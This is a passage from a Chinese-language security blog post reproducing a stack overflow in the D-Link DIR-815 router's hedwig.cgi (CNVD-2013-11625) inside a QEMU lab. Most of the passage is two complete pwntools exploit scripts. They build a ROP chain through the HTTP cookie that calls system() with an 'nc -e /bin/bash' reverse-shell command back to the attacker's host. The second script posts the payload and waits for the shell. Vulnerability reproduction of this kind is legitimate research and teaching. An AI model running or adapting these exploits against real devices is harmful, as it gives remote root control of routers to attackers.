<span class="token builtin class-name">echo</span> <span class="token string">"X1NRI=pwner"</span><span class="token operator">|</span>./gdbserver.mipsel :1234 /htdocs/web/hedwig.cgi
<span class="token comment">#echo "X1NRI=pwner"| /htdocs/web/hedwig.cgi</span>
<span class="token builtin class-name">unset</span> CONTENT_LENGTH
<span class="token builtin class-name">unset</span> CONTENT_TYPE
<span class="token builtin class-name">unset</span> HTTP_COOKIE
<span class="token builtin class-name">unset</span> REQUEST_METHOD
<span class="token builtin class-name">unset</span> REQUEST_URI
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>调试看到libc的基址：<br><img src="/RW_FILE/df147182a42fb713e2dcc84e85975e02_MD5.jpeg"></p>
<p>在主函数栈回溯时汇编如下：<br><img src="/RW_FILE/f815e18799a272e461f24abdf9e3ab80_MD5.jpeg"><br>我们可以控制<code>$s0~$s7、$fp、$ra</code>寄存器的值</p>
<p>需要注意的是，system的地址为<code>0x00053200</code>，如果直接发送会使sprintf出现00截断。对策是先将 <code>system</code> 函数的地址 -1 传入某个寄存器中，之后找到对这个寄存器进行加 +1 的操作的 gadget 进行调用即可将<code>system</code>地址恢复。</p>
<ul>
<li><p>因此我们查找<code>addiu $s0,1</code>，选择的是0x158c8处的gadget<br><img src="/RW_FILE/cbc5e859772b1658c068e486a0a08bed_MD5.jpeg"><br><img src="/RW_FILE/37271328256a76fab79605bcaf3488bd_MD5.jpeg"><br>这个gadget会将<code>$s0</code>+1，并跳转到<code>$s5</code>：可以将<code>$s0</code>赋值为system-1</p>
</li>
<li><p>利用mipsrop.stackfinder()，查找能够传参的gadget，选择的是0x159cc处的gadget<br><img src="/RW_FILE/cfbfb5bfe277500ce078bebecb2d9473_MD5.jpeg"><br><img src="/RW_FILE/5805129b055fe40a24121f61d3662f0c_MD5.jpeg"><br>这个gadget能够赋值<code>$a0</code>为<code>$sp+0x10</code>，然后跳转到<code>$s0</code></p>
</li>
</ul>
<p>exp如下：</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token comment">#!/usr/bin/env python3</span>
<span class="token comment"># -*- coding: utf-8 -*-</span>
<span class="token comment">#@Author:X1NRI</span>
<span class="token keyword">import</span> sys
<span class="token keyword">import</span> os
<span class="token keyword">from</span> pwn <span class="token keyword">import</span><span class="token operator">*</span>

context<span class="token punctuation">(</span>os<span class="token operator">=</span><span class="token string">'linux'</span><span class="token punctuation">,</span>arch<span class="token operator">=</span><span class="token string">'mips'</span><span class="token punctuation">,</span>bits<span class="token operator">=</span><span class="token number">32</span><span class="token punctuation">,</span>endian<span class="token operator">=</span><span class="token string">'little'</span><span class="token punctuation">)</span>
context<span class="token punctuation">.</span>log_level<span class="token operator">=</span><span class="token string">'debug'</span>


libc<span class="token operator">=</span>ELF<span class="token punctuation">(</span><span class="token string">'./squashfs-root/lib/libc.so.0'</span><span class="token punctuation">)</span>
libc<span class="token punctuation">.</span>address<span class="token operator">=</span><span class="token number">0x77f34000</span>
system<span class="token operator">=</span>libc<span class="token punctuation">.</span>sym<span class="token punctuation">[</span><span class="token string">'system'</span><span class="token punctuation">]</span>

gadget1<span class="token operator">=</span><span class="token number">0x158c8</span> <span class="token comment">#jalr s5; addiu s0,1</span>
gadget2<span class="token operator">=</span><span class="token number">0x159cc</span> <span class="token comment">#addiu s5, sp, 0x10; jalr s0; move a0, s5</span>

cmd<span class="token operator">=</span><span class="token string">b'nc -e /bin/bash 192.168.100.1 4321'</span>

payload_header<span class="token operator">=</span><span class="token builtin">len</span><span class="token punctuation">(</span><span class="token string">'/htdocs/webinc/fatlady.php\nprefix=/runtime/session/'</span><span class="token punctuation">)</span>
payload<span class="token operator">=</span><span class="token string">b'a'</span><span class="token operator">*</span><span class="token punctuation">(</span><span class="token number">0x400</span><span class="token operator">-</span>payload_header<span class="token punctuation">)</span>
payload <span class="token operator">+=</span> p32<span class="token punctuation">(</span>system<span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">)</span> 				<span class="token comment">#s0</span>
payload <span class="token operator">+=</span> <span class="token string">b'a'</span><span class="token operator">*</span><span class="token number">4</span>						<span class="token comment">#s1  </span>
payload <span class="token operator">+=</span> <span class="token string">b'a'</span><span class="token operator">*</span><span class="token number">4</span>						<span class="token comment">#s2</span>
payload <span class="token operator">+=</span> <span class="token string">b'a'</span><span class="token operator">*</span><span class="token number">4</span>						<span class="token comment">#s3</span>
payload <span class="token operator">+=</span> <span class="token string">b'a'</span><span class="token operator">*</span><span class="token number">4</span>						<span class="token comment">#s4</span>
payload <span class="token operator">+=</span> p32<span class="token punctuation">(</span>libc<span class="token punctuation">.</span>address<span class="token operator">+</span>gadget2<span class="token punctuation">)</span>	<span class="token comment">#s5</span>
payload <span class="token operator">+=</span> <span class="token string">b'a'</span><span class="token operator">*</span><span class="token number">4</span>						<span class="token comment">#s6</span>
payload <span class="token operator">+=</span> <span class="token string">b'a'</span><span class="token operator">*</span><span class="token number">4</span>						<span class="token comment">#s7</span>
payload <span class="token operator">+=</span> <span class="token string">b'a'</span><span class="token operator">*</span><span class="token number">4</span>						<span class="token comment">#fp</span>
payload <span class="token operator">+=</span> p32<span class="token punctuation">(</span>libc<span class="token punctuation">.</span>address<span class="token operator">+</span>gadget1<span class="token punctuation">)</span>	<span class="token comment">#ra</span>
payload <span class="token operator">+=</span> <span class="token string">b'b'</span><span class="token operator">*</span><span class="token number">0x10</span>
payload <span class="token operator">+=</span> cmd


fd <span class="token operator">=</span> <span class="token builtin">open</span><span class="token punctuation">(</span><span class="token string">'./payload'</span><span class="token punctuation">,</span><span class="token string">'wb'</span><span class="token punctuation">)</span>
fd<span class="token punctuation">.</span>write<span class="token punctuation">(</span>payload<span class="token punctuation">)</span>
fd<span class="token punctuation">.</span>close<span class="token punctuation">(</span><span class="token punctuation">)</span>
os<span class="token punctuation">.</span>system<span class="token punctuation">(</span><span class="token string">'scp ./payload root@192.168.100.2:/root/squashfs-root '</span><span class="token punctuation">)</span>	
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>在本地监听4321端口，成功反弹shell：<br><img src="/RW_FILE/6cd2b86aee472fc99d5720ed5b8c55c6_MD5.jpeg"></p>
<h4 id="②-远程发送http报文（远程）"><a href="#②-远程发送http报文（远程）" class="headerlink" title="② 远程发送http报文（远程）"></a>② 远程发送http报文（远程）</h4><p>我们既然开启了httpd服务，就可以直接发送数据包</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token comment">#!/usr/bin/env python3</span>
<span class="token comment"># -*- coding: utf-8 -*-</span>
<span class="token comment">#@Author:X1NRI</span>
<span class="token keyword">import</span> sys
<span class="token keyword">import</span> os
<span class="token keyword">import</span> requests
<span class="token keyword">from</span> pwn <span class="token keyword">import</span><span class="token operator">*</span>

context<span class="token punctuation">(</span>os<span class="token operator">=</span><span class="token string">'linux'</span><span class="token punctuation">,</span>arch<span class="token operator">=</span><span class="token string">'mips'</span><span class="token punctuation">,</span>bits<span class="token operator">=</span><span class="token number">32</span><span class="token punctuation">,</span>endian<span class="token operator">=</span><span class="token string">'little'</span><span class="token punctuation">)</span>
context<span class="token punctuation">.</span>log_level<span class="token operator">=</span><span class="token string">'debug'</span>


libc<span class="token operator">=</span>ELF<span class="token punctuation">(</span><span class="token string">'./squashfs-root/lib/libc.so.0'</span><span class="token punctuation">)</span>
libc<span class="token punctuation">.</span>address<span class="token operator">=</span><span class="token number">0x77f34000</span>
system<span class="token operator">=</span>libc<span class="token punctuation">.</span>sym<span class="token punctuation">[</span><span class="token string">'system'</span><span class="token punctuation">]</span>

gadget1<span class="token operator">=</span><span class="token number">0x158c8</span> <span class="token comment">#jalr s5; addiu s0,1</span>
gadget2<span class="token operator">=</span><span class="token number">0x159cc</span> <span class="token comment">#addiu s5, sp, 0x10; jalr s0; move a0, s5</span>

cmd<span class="token operator">=</span><span class="token string">b'nc -e /bin/bash 192.168.100.1 4321'</span>

payload_header<span class="token operator">=</span><span class="token builtin">len</span><span class="token punctuation">(</span><span class="token string">'/htdocs/webinc/fatlady.php\nprefix=/runtime/session/'</span><span class="token punctuation">)</span>
payload<span class="token operator">=</span><span class="token string">b'a'</span><span class="token operator">*</span><span class="token punctuation">(</span><span class="token number">0x400</span><span class="token operator">-</span>payload_header<span class="token punctuation">)</span>
payload <span class="token operator">+=</span> p32<span class="token punctuation">(</span>system<span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">)</span> 				<span class="token comment">#s0</span>
payload <span class="token operator">+=</span> <span class="token string">b'a'</span><span class="token operator">*</span><span class="token number">4</span>						<span class="token comment">#s1  </span>
payload <span class="token operator">+=</span> <span class="token string">b'a'</span><span class="token operator">*</span><span class="token number">4</span>						<span class="token comment">#s2</span>
payload <span class="token operator">+=</span> <span class="token string">b'a'</span><span class="token operator">*</span><span class="token number">4</span>						<span class="token comment">#s3</span>
payload <span class="token operator">+=</span> <span class="token string">b'a'</span><span class="token operator">*</span><span class="token number">4</span>						<span class="token comment">#s4</span>
payload <span class="token operator">+=</span> p32<span class="token punctuation">(</span>libc<span class="token punctuation">.</span>address<span class="token operator">+</span>gadget2<span class="token punctuation">)</span>	<span class="token comment">#s5</span>
payload <span class="token operator">+=</span> <span class="token string">b'a'</span><span class="token operator">*</span><span class="token number">4</span>						<span class="token comment">#s6</span>
payload <span class="token operator">+=</span> <span class="token string">b'a'</span><span class="token operator">*</span><span class="token number">4</span>						<span class="token comment">#s7</span>
payload <span class="token operator">+=</span> <span class="token string">b'a'</span><span class="token operator">*</span><span class="token number">4</span>						<span class="token comment">#fp</span>
payload <span class="token operator">+=</span> p32<span class="token punctuation">(</span>libc<span class="token punctuation">.</span>address<span class="token operator">+</span>gadget1<span class="token punctuation">)</span>	<span class="token comment">#ra</span>
payload <span class="token operator">+=</span> <span class="token string">b'b'</span><span class="token operator">*</span><span class="token number">0x10</span>
payload <span class="token operator">+=</span> cmd


url <span class="token operator">=</span> <span class="token string">"http://192.168.100.2:8888/hedwig.cgi"</span>
data <span class="token operator">=</span> <span class="token punctuation">&#123;</span><span class="token string">'X1NRI'</span><span class="token punctuation">:</span><span class="token string">'pwner'</span><span class="token punctuation">&#125;</span>
headers <span class="token operator">=</span> <span class="token punctuation">&#123;</span>
    <span class="token string">"Cookie"</span>        <span class="token punctuation">:</span> <span class="token string">b"uid="</span> <span class="token operator">+</span> payload<span class="token punctuation">,</span>
    <span class="token string">"Content-Type"</span>  <span class="token punctuation">:</span> <span class="token string">"application/x-www-form-urlencoded"</span><span class="token punctuation">,</span>
    <span class="token string">"Content-Length"</span><span class="token punctuation">:</span> <span class="token string">"11"</span>
<span class="token punctuation">&#125;</span>


<span class="token keyword">def</span> <span class="token function">get_shell</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
	sh<span class="token operator">=</span>listen<span class="token punctuation">(</span><span class="token number">4321</span><span class="token punctuation">)</span>
	sh<span class="token punctuation">.</span>wait_for_connection<span class="token punctuation">(</span><span class="token punctuation">)</span>
	sh<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span>

shell<span class="token operator">=</span>threading<span class="token punctuation">.</span>Thread<span class="token punctuation">(</span>target<span class="token operator">=</span>get_shell<span class="token punctuation">)</span>
shell<span class="token punctuation">.</span>start<span class="token punctuation">(</span><span class="token punctuation">)</span>

res <span class="token operator">=</span> requests<span class="token punctuation">.</span>post<span class="token punctuation">(</span>url <span class="token operator">=</span> url<span class="token punctuation">,</span> headers <span class="token operator">=</span> headers<span class="token punctuation">,</span> data <span class="token operator">=</span> data<span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>res<span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>成功反弹shell<br><img src="/RW_FILE/053cc211b8474e14338fa9c4d53587e5_MD5.jpeg"></p>

	  <div class="article-footer-copyright">

    本博客采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank">知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.</a>
</div>

	</div>

	
	<span id="/2024/04/20/D-Link%20DIR-815%20%E8%B7%AF%E7%94%B1%E5%99%A8%E5%A4%9A%E6%AC%A1%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%20(CNVD-2013-11625)/" class="leancloud-visitors view" data-flag-title="D-Link DIR-815 路由器多次栈溢出漏洞复现 (CNVD-2013-11625)">
		<em class="post-meta-item-text"> Page View </em> <i class="leancloud-visitors-count"></i>
	</span>
	
	
	<div>
  	<center>

	<div class="pagination">

    
    
    <a href="/2024/05/11/Kenobi/" type="button" class="btn btn-default"><i
                class="fa fa-arrow-circle-o-left"></i> Prev</a>
    

    <a href="/" type="button" class="btn btn-default"><i class="fa fa-home"></i>Home</a>
    
    <a href="/2024/04/10/RWCTF2023体验赛 - Digging into kernel 3/" type="button" class="btn btn-default ">Next<i
                class="fa fa-arrow-circle-o-right"></i></a>
    

    
</div>


    </center>
	</div>
	
	<!-- comment -->
	<!--
<section id="comment">
    <h2 class="title">Comments</h2>

    
</section>

-->
	
		<section id="comments" class="comments">
			<style>
			.comments{margin:30px;padding:10px;background:rgb(0, 0, 0)}
			@media screen and (max-width:800px){.comments{margin:auto;padding:10px;background:#000}}
			</style>
			<div id="vcomment" class="comment"></div>
<script src='//unpkg.com/valine/dist/Valine.min.js'></script>
<script src="https://cdnjs.loli.net/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<script>
var valineConfig = {"enable":true,"appId":"QrmzEeS3e4xvmJxO1dSPlkW4-gzGzoHsz","appKey":"ov6uvwKnDQmJxtpeS0wvBIwL","placeholder":"","visitor":true,"avatar":"monsterid","requiredFields":["nick","mail"],"pageView":true}
valineConfig.el='#vcomment';
new Valine(valineConfig);
    // new Valine({
    //     el: '#vcomment',
    //     appId: "",
    //     appKey: "",
    //     placeholder: "",
    //     avatar:"monsterid",
    //     visitor: "true",
    //     requiredFields: "nick,mail".split(','),
    // });
</script>

		</section>
	
	
	
	</div> <!-- col-md-9/col-md-12 -->


	
	<div id="side_meta">
		<div class="col-md-3" id="post_meta"> 

	<!-- date -->
	
	<div class="meta-widget">
	<i class="fa fa-clock-o"></i>
	2024-04-20 
	</div>
	

	<!-- categories -->
    
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#categorys"><i class="fa fa-folder"></i></a>	
    <ul id="categorys" class="tag_box list-unstyled collapse in">
          
  <li>
    <li><a href="/categories/RealWorld/">RealWorld<span>2</span></a></li>
  </li>

    </ul>
	</div>
	

	<!-- tags -->
	
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#tags"><i class="fa fa-tags"></i></a>		  
    <ul id="tags" class="tag_box list-unstyled collapse in">	  
	    
  <li><a href="/tags/IOT/">IOT<span>2</span></a></li>
    </ul>
	</div>
		

	<!-- toc -->
	<div class="meta-widget">
	
	   <a data-toggle="collapse" data-target="#toc"><i class="fa fa-bars"></i></a>
	   <div id="toc" class="toc collapse in">
		   <span class="toc-title">Contents</span>
			<ol class="toc-article"><li class="toc-article-item toc-article-level-1"><a class="toc-article-link" href="#%E4%B8%80%E3%80%81%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="toc-article-text">一、漏洞分析</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#%E5%9B%BA%E4%BB%B6%E8%A7%A3%E5%8E%8B"><span class="toc-article-text">固件解压</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#%E9%80%86%E5%90%91%E5%88%86%E6%9E%90"><span class="toc-article-text">逆向分析</span></a></li></ol></li><li class="toc-article-item toc-article-level-1"><a class="toc-article-link" href="#%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="toc-article-text">漏洞复现</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#qemu-%E7%94%A8%E6%88%B7%E6%A8%A1%E5%BC%8F%E5%A4%8D%E7%8E%B0"><span class="toc-article-text">qemu 用户模式复现</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#qemu-%E7%B3%BB%E7%BB%9F%E6%A8%A1%E5%BC%8F%E5%A4%8D%E7%8E%B0"><span class="toc-article-text">qemu 系统模式复现</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE"><span class="toc-article-text">环境配置</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#1-%E5%90%AF%E5%8A%A8qemu"><span class="toc-article-text">1.启动qemu</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#2-%E5%AE%9E%E7%8E%B0qemu%E8%99%9A%E6%9C%BA-%E5%AE%BF%E4%B8%BB%E6%9C%BA%E7%BD%91%E7%BB%9C%E4%BA%92%E9%80%9A"><span class="toc-article-text">2.实现qemu虚机&amp;宿主机网络互通</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#3-%E4%BA%8B%E5%89%8D%E9%85%8D%E7%BD%AE"><span class="toc-article-text">3.事前配置</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#4-%E5%90%AF%E5%8A%A8httpd%E6%9C%8D%E5%8A%A1"><span class="toc-article-text">4.启动httpd服务</span></a></li></ol></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-article-text">漏洞利用</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#%E2%91%A0-%E5%B0%86%E7%94%9F%E6%88%90%E7%9A%84payload%E4%BC%A0%E7%BB%99qemu%E6%9C%BA%EF%BC%88%E6%9C%AC%E5%9C%B0%EF%BC%89"><span class="toc-article-text">① 将生成的payload传给qemu机（本地）</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#%E2%91%A1-%E8%BF%9C%E7%A8%8B%E5%8F%91%E9%80%81http%E6%8A%A5%E6%96%87%EF%BC%88%E8%BF%9C%E7%A8%8B%EF%BC%89"><span class="toc-article-text">② 远程发送http报文（远程）</span></a></li></ol></li></ol></li></ol></li></ol>
		</div>
	
	</div>
	
    <hr>
	
</div><!-- col-md-3 -->

		

	</div>
	
		

</div><!-- row -->

<!--
 -->



	</div>
  </div>
  <div class="container-narrow">
  <footer> <p>
  
  &copy; 2024 X1NRI's Blog
  
      powered by <a href="http://hexo.io/" target="_blank">Hexo</a>.Theme <a href="https://github.com/Ares-X/hexo-theme-freemind.bithack" target="_blank">freemind.bithack</a>  
</p>
 </footer>
</div> <!-- container-narrow -->
  


  
<a id="gotop" href="#">   
  <span>⬆︎TOP</span>
</a>

<script src="/js/jquery.imagesloaded.min.js"></script>
<script src="/js/gallery.js"></script>
<script src="/js/bootstrap.min.js"></script>
<script src="/js/main.js"></script>
<script src="/js/search.js"></script> 


<link rel="stylesheet" href="/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
(function($){
  $('.fancybox').fancybox();
})(jQuery);
</script>



   <script type="text/javascript">      
     var search_path = "search.xml";
	 if (search_path.length == 0) {
	 	search_path = "search.xml";
	 }
	 var path = "/" + search_path;
     searchFunc(path, 'local-search-input', 'local-search-result');
   </script>

</body>
   </html>
